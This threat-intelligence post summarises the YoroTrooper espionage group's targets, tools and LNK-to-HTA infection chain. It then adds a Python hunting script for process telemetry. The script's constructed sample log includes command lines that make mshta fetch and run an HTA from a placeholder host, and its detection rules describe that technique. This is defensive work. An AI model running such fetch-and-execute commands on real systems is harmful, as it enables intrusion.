A threat actor tracked as “YoroTrooper” has had several espionage campaigns attributed to it by Cisco Talos, with activity dating back to at least June 2022. YoroTrooper has targeted government and energy organizations in the Commonwealth of Independent States (CIS), a health care agency in the European Union and the World Intellectual Property Organization (WIPO). Because several of the implants it used contain Cyrillic strings, Cisco Talos assesses the group to be Russian-speaking. Its toolkit consists primarily of custom and open-source Python-based information stealers such as Stink Stealer, packaged into standalone executables with tools like PyInstaller. For remote access, YoroTrooper has mainly deployed commodity malware such as AveMaria, Warzone RAT, LodaRAT and Meterpreter. The infection chain relies on spearphishing to convince victims to download a malicious archive containing .LNK files. When opened, the .LNK files download a malicious HTA file, which in turn loads the final dropper that launches the Python-based stealer.
Phishing remains highly prevalent in the current threat landscape and is frequently used as an initial access vector by threat groups; archive files that hide malicious payloads are likewise common. YoroTrooper also relies on open-source and commercially available tooling, which makes attribution harder. The same choice gives defenders and researchers an opening, though: detections built around widely used open-source offensive tools cover this actor’s toolkit as well as that of any other group that uses them. A strong phishing awareness program, paired with regular review of social engineering risks, strengthens an organization’s security posture and can stop threats before they land on a network. Perimeter security is most effective, however, as part of a defense in depth strategy that also proactively hunts for post-compromise activity. Binary Defense’s MDR and Threat Hunting offerings are an excellent solution to assist with such a strategy.
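As an added example of the kind of post-compromise hunt the paragraph above calls for (this is not code from the original post, from Cisco Talos or from Binary Defense), the following Python walks process-creation telemetry for the .LNK → HTA → dropper chain described earlier. It assumes a simplified, constructed record format (`pid|ppid|image|cmdline`), loosely a subset of a Sysmon Event ID 1 or EDR process-creation event; real field names differ by product. The `example.invalid` host, PIDs, paths and file names in the sample log are made up. Two heuristics are applied: `mshta.exe` (the Windows HTA host) launched against a remote HTA, and a binary running from a user-writable location whose process ancestry contains `mshta.exe`.

```python
"""
Hunting query for the LNK -> HTA -> dropper chain over process-creation
telemetry. Added example; not code from the original post, Cisco Talos or
Binary Defense. Assumes a constructed 'pid|ppid|image|cmdline' record format
(roughly a subset of a Sysmon Event ID 1 event); real field names differ.
"""
import re
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str


# The page describes the .LNK downloading a malicious HTA; mshta.exe is the
# Windows HTA host, so a remote URL on its command line is the first signal.
REMOTE_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# User-writable locations where a downloaded dropper typically lands.
USER_WRITABLE_RE = re.compile(r"\\(?:Temp|Downloads)\\", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(lines: list[str]) -> list[Proc]:
    """Parse 'pid|ppid|image|cmdline' records; blank and '#' lines are skipped."""
    procs = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        pid, ppid, image, cmdline = line.split("|", 3)
        procs.append(Proc(int(pid), int(ppid), image, cmdline))
    return procs


def ancestry(by_pid: dict[int, Proc], pid: int, max_depth: int = 8) -> list[Proc]:
    """Process chain from pid up to its root, child first; bounded and cycle-safe."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen and len(chain) < max_depth:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain


def hunt(events: list[Proc]) -> list[str]:
    """Return one finding string per suspicious process, in event order."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = basename(e.image)
        # Rule 1: mshta.exe pointed at a remote HTA.
        if name == "mshta.exe" and REMOTE_RE.search(e.cmdline):
            findings.append(f"pid {e.pid}: mshta.exe launched with remote HTA: {e.cmdline}")
            continue
        # Rule 2: a binary running from a user-writable path whose ancestry
        # includes mshta.exe, i.e. the dropper/stealer stage of the chain.
        if USER_WRITABLE_RE.search(e.image):
            chain = ancestry(by_pid, e.pid)
            if any(basename(p.image) == "mshta.exe" for p in chain[1:]):
                path = " <- ".join(basename(p.image) for p in chain)
                findings.append(f"pid {e.pid}: {name} from user-writable path, descended from mshta.exe: {path}")
    return findings


# Constructed sample telemetry (not real data). example.invalid is a reserved
# test domain; PIDs, paths and file names are made up for illustration.
SAMPLE_LOG = """
# pid|ppid|image|cmdline
1000|4|C:\\Windows\\explorer.exe|explorer.exe
# .LNK target run via explorer: fetches and executes the HTA
1100|1000|C:\\Windows\\System32\\cmd.exe|cmd.exe /c mshta http://example.invalid/doc.hta
1200|1100|C:\\Windows\\System32\\mshta.exe|mshta http://example.invalid/doc.hta
1300|1200|C:\\Users\\u\\AppData\\Local\\Temp\\report.exe|report.exe
# benign: vendor installer using a local HTA, binary under Program Files
2000|1000|C:\\Windows\\System32\\mshta.exe|mshta "C:\\Program Files\\Vendor\\setup.hta"
2100|2000|C:\\Program Files\\Vendor\\helper.exe|helper.exe
# benign: browser download run by the user, no mshta.exe in its ancestry
3000|1000|C:\\Program Files\\Browser\\browser.exe|browser.exe
3100|3000|C:\\Users\\u\\Downloads\\installer.exe|installer.exe
""".splitlines()


def run_sample() -> list[str]:
    """Run the hunt over the constructed sample; expect two findings (pids 1200 and 1300)."""
    return hunt(parse_events(SAMPLE_LOG))


if __name__ == "__main__":
    for finding in run_sample():
        print(finding)
```

On the sample, only the remote-HTA `mshta.exe` (pid 1200) and the executable it ultimately spawned from `%TEMP%` (pid 1300) are flagged; the vendor installer using a local HTA and the user's browser download are not, because rule 1 requires a URL and rule 2 requires `mshta.exe` somewhere in the ancestry. The ancestry walk is bounded and guarded against PID reuse loops, which real telemetry does produce. In production the rules would be expressed in the SIEM or EDR query language and tuned against the environment's legitimate HTA use.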